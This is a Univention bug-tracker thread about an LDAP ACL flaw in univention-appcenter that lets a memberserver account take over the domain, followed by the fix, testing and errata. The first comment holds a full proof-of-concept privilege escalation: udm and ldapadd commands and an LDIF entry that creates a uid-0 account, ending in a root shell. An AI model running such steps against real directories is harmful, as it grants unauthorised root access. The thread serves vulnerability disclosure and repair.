Univention Bugzilla – Bug 41724
univention-appcenter - take over complete domain as memberserver
Last modified: 2021-06-23 07:29:07 CEST
The ACL rules in the package univention-appcenter have to be adjusted. +++ This bug was initially created as a clone of Bug #41715 +++ Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base. root@xen3:~# eval "$(ucr shell)" root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base" Object created: cn=memberserver,cn=computers,dc=school,dc=local root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local # now PWN it $ cat posix_account.ldif dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local univentionAppID: foobar objectClass: univentionApp objectClass: posixAccount uid: hacker cn: hacker uidNumber: 0 gidNumber: 0 homeDirectory: /root loginShell: /bin/bash userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8= $ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local" $ su hacker Passwort: hacker@xen3:~# id uid=0(hacker) gid=0(root) Gruppen=0(root)
*** Bug 32886 has been marked as a duplicate of this bug. ***
univention-appcenter (5.0.21-14): r70813 | Bug #41724: restrict access to univentionApp object class univention-appcenter.yaml: r70817 | YAML Bug #41724
Tested it. One may still install Apps, they can be registered. Also, the example exploit is not possible anymore. Normally: VERIFIED. But we have >50 tests failing since the Bug was RESOLVED and they do not go away. I have reverted the patch to see whether this indeed has something to do with this very bug.
(In reply to Dirk Wiesenthal from comment #3) > Tested it. One may still install Apps, they can be registered. Also, the > example exploit is not possible anymore. Normally: VERIFIED. But we have >50 > tests failing since the Bug was RESOLVED and they do not go away. I have > reverted the patch to see whether this indeed has something to do with this > very bug. There are 32 less errors this night. But I guess this is caused by svn r70925 - not the revert.
(In reply to Florian Best from comment #4) > (In reply to Dirk Wiesenthal from comment #3) > > Tested it. One may still install Apps, they can be registered. Also, the > > example exploit is not possible anymore. Normally: VERIFIED. But we have >50 > > tests failing since the Bug was RESOLVED and they do not go away. I have > > reverted the patch to see whether this indeed has something to do with this > > very bug. > > There are 32 less errors this night. But I guess this is caused by svn > r70925 - not the revert. Yes, the revert was to late for the last Jenkins run.
(In reply to Stefan Gohmann from comment #5) > (In reply to Florian Best from comment #4) > > (In reply to Dirk Wiesenthal from comment #3) > > > Tested it. One may still install Apps, they can be registered. Also, the > > > example exploit is not possible anymore. Normally: VERIFIED. But we have >50 > > > tests failing since the Bug was RESOLVED and they do not go away. I have > > > reverted the patch to see whether this indeed has something to do with this > > > very bug. > > > > There are 32 less errors this night. But I guess this is caused by svn > > r70925 - not the revert. > > Yes, the revert was to late for the last Jenkins run. Yes, the old version was installed in the tests: univention-management-console-module-appcenter 5.0.21-14.182.201607041949 I will revert the revert somewhen today. There are still ~6 different tests failing due to Bug #41715.
univention-appcenter (5.0.21-17): r70935 | Revert "* Bug #41724: Revert"
OK works. Tests are fine again.
<http://errata.software-univention.de/ucs/4.1/218.html>